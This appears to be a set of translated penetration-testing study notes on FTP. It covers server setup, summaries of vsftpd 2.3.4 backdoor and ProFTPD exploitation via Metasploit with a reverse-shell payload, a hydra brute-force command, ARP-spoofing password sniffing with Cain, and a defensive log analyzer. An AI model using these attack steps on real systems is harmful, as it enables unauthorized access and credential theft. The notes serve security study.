Ports and services: FTP
1 Overview
1.1. Crawl historical port-vulnerability reports from Xianzhi ("Prophet") and WooYun, and summarize each report
1.2. Consolidate the findings into a summary table
2. FTP
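# -*- coding: utf-8 -*-
# Search the WooYun mirror for reports matching a keyword and print each hit.
# Arguments: <keywords> <page>
import re
import sys

import requests


def wooyun_chax(keywords, page):
    # Let requests URL-encode the query parameters
    params = {"keywords": keywords, "content_search_by": "by_bugs",
              "search_by_html": "False", "page": page}
    req = requests.get("https://wooyun.x10sec.org/search", params=params, timeout=10)
    print(req.url)
    # Each match is a tuple: (relative link, report title)
    r = re.findall(r'<td><a href="(.*?)" target="_blank">\s(.*?)</a>', req.text)
    for i in r:
        print("漏洞名称:" + i[1])  # vulnerability name
        print("漏洞链接:" + "https://wooyun.x10sec.org/" + i[0])  # vulnerability link
        print("漏洞总结:")  # vulnerability summary


if __name__ == "__main__":
    wooyun_chax(sys.argv[1], sys.argv[2])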
2.1 FTP setup
IIS setup
1. Install the FTP service: Control Panel - Programs and Features - Turn Windows features on or off - Internet Information Services - FTP Service
2. Find the FTP service: Computer - Manage - IIS
3. Create an FTP site: right-click - Add FTP Site - fill in the site name / directory - port and IP - permission settings
4. Start the site
FileZilla Server setup
1. Install: search for FileZilla Server, download it, install it, and open it
2. Configure: open it and set the port, then Edit - Users - Shared folders to set the directory; add a user and set a password under General
3. Review the log: Edit - Settings
2.2 Typical cases
1. vsftpd backdoor: https://www.freebuf.com/column/143480.html
Summary
  1. Search: ZoomEye, product: vsftpd 2.3.4
  2. nmap vulnerability detection: nmap --script=vuln; the output also indicates when anonymous login is possible
  3. msf attack
    1. use exploit/unix/ftp/vsftpd_234_backdoor
    2. set rhost and rport
    3. exploit
    4. Create a user and escalate privileges
2. FTP remote code execution via overflow: https://blog.csdn.net/weixin_42214273/article/details/82892282
Summary
  1. Environment: target machine 192.168.88.165, attacking machine 192.168.88.138
  2. Scanning: nmap -sV 192.168.88.165 scans services and versions
     nmap -A -v 192.168.88.165 scans for all information (difficult to use)
     nmap -O 192.168.88.165 detects the target's operating system type and version
  3. Service found: FTP, ProFTPD 1.3.3c
  4. Search for vulnerabilities in Kali: searchsploit proFTPD 1.3.3c (nothing found)
  5. Search msf for the corresponding module: search proFTPD 1.3.3c
  Configuration
    1. Set the payload: set payload cmd/unix/reverse
    2. set lhost and rhost
    3. exploit
    4. Check with id
    5. Terminal upgrade: python -c "import pty; pty.spawn('/bin/bash')"
    6. Get the flag: the flag is generally placed in root's directory: cd /root
3. FTP bounce attack: https://blog.csdn.net/mgxcool/article/details/48249473
2.3 Attacks
Target: ftp://192.168.43.85
1. Normal login: enter the username and password. If the text is garbled, fix it via Control Panel - Region and Language - current system locale - set to Chinese (Simplified)
2. Anonymous access: user name: anonymous, password: empty or any email address
3. Direct access
4. Brute-force guessing: hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt
5. vsftpd backdoor
6. FTP remote code execution via overflow
7. FTP bounce attack
8. Sniffing the FTP password with Cain
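Seen from the server side, items 2 and 4 above leave clear traces in the FTP log. The following is an added example (not part of the original page) that scans vsftpd-style log lines for anonymous logins and for bursts of failed logins followed by a success. The log layout, the constructed sample lines, the thresholds and the name analyze_ftp_log are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in vsftpd's log layout (assumed format; addresses are made up).
SAMPLE_LOG = '''\
Sat Mar  2 10:14:40 2024 [pid 2290] [ftp] OK LOGIN: Client "192.168.43.77", anon password "a@b.c"
Sat Mar  2 10:15:01 2024 [pid 2314] CONNECT: Client "192.168.43.90"
Sat Mar  2 10:15:02 2024 [pid 2313] [admin] FAIL LOGIN: Client "192.168.43.90"
Sat Mar  2 10:15:04 2024 [pid 2317] [root] FAIL LOGIN: Client "192.168.43.90"
Sat Mar  2 10:15:06 2024 [pid 2321] [test] FAIL LOGIN: Client "192.168.43.90"
Sat Mar  2 10:15:09 2024 [pid 2325] [test] OK LOGIN: Client "192.168.43.90"
Sat Mar  2 11:30:00 2024 [pid 2501] [alice] FAIL LOGIN: Client "192.168.43.12"
Sat Mar  2 11:30:20 2024 [pid 2503] [alice] OK LOGIN: Client "192.168.43.12"
'''

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"(?P<anon>, anon password)?'
)

def analyze_ftp_log(text, threshold=3, window=timedelta(seconds=60)):
    """Return (kind, ip, user) findings for guessing bursts and anonymous logins."""
    recent_fails = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = set()                     # ips that crossed the failure threshold
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # CONNECT, transfer and other lines
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        q = recent_fails[ip]
        while q and ts - q[0] > window:
            q.popleft()                 # age out failures older than the window
        if m["result"] == "FAIL":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                findings.append(("password_guessing", ip, None))
        elif m["anon"]:
            findings.append(("anonymous_login", ip, user))
        elif ip in flagged:             # any later success from a flagged source
            findings.append(("login_after_guessing", ip, user))
    return findings

if __name__ == "__main__":
    for finding in analyze_ftp_log(SAMPLE_LOG):
        print(finding)
```

A single mistyped password followed by a success (the alice lines) stays below the threshold and is not reported.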
2.4 Sniffing the FTP password with Cain
1. Configure: Cain - Configure - Sniffer: select the network card to sniff on
   ARP: a spoofed IP and MAC address can be set
   Filters and ports: set the ports to sniff
2. Operation: find the IP to spoof: click Sniffer - Scan MAC Addresses - open the ARP page - select the IP to spoof
   Click to start sniffing
   Result: captured passwords are displayed under Passwords